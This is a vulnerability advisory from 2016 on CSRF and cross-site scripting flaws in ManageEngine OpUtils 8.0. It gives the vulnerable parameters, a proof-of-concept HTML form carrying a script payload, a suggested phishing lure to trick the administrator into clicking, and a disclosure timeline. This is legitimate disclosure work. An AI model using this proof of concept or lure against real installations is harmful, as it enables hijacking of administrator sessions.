Manage Engine OPutils 8.0 Cross Site Request Forgery / Cross Site Scripting

`==================================================  
CSRF and XsS In Manage Engine oputils  
==================================================  
  
. contents:: Table Of Content  
  
Overview  
========  
  
* Title : CSRF and XSS In Manage Engine OPutils  
* Author: Kaustubh G. Padwad  
* Plugin Homepage: https://www.manageengine.com/products/oputils/  
* Severity: HIGH  
* Version Affected: Version 8.0  
* Version Tested : Version 8.0  
* version patched:   
  
Advisory ID  
============  
2016-01-Manage_Engine  
  
Description   
===========  
  
About the Product  
=================  
  
OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more.  
  
  
Vulnerable Parameter   
--------------------  
1. RouterName   
2. action Form  
3. selectedSwitchTab  
4. ipOrHost  
5. alertMsg  
6. hostName   
7. switchID  
8. oidString  
  
About Vulnerability  
-------------------  
This Application is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin?s browser can be made t do almost anything the admin user could typically do by hijacking admin's cookies etc.  
  
Vulnerability Class  
===================   
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)  
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)   
  
Steps to Reproduce: (POC)  
=========================  
  
* Add follwing code to webserver and send that malicious link to application Admin.  
* The admin should be loggedin when he clicks on the link.  
* Soical enginering might help here   
  
For Example :- Device password has been changed click here to reset  
  
####################CSRF COde#######################  
<html>  
  
<body>  
  
<form action="http://192.168.1.10:7080/DeviceExplorer.cc">  
  
<input type="hidden" name="RouterName" value="kaus"><img src=a onerror=confirm("Kaustubh")>tubh" />  
  
<input type="submit" value="Submit request" />  
  
</form>  
  
</body>  
  
</html>  
  
  
  
Mitigation   
==========  
Upgrade to next service pack  
  
  
Change Log  
==========  
  
  
Disclosure   
==========  
28-January-2016 Reported to Developer  
28-January-2016 Acknodlagement from developer  
11-February-2016 Fixed by vendor ()  
  
credits  
=======  
* Kaustubh Padwad   
* Information Security Researcher  
* [email protected]   
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
`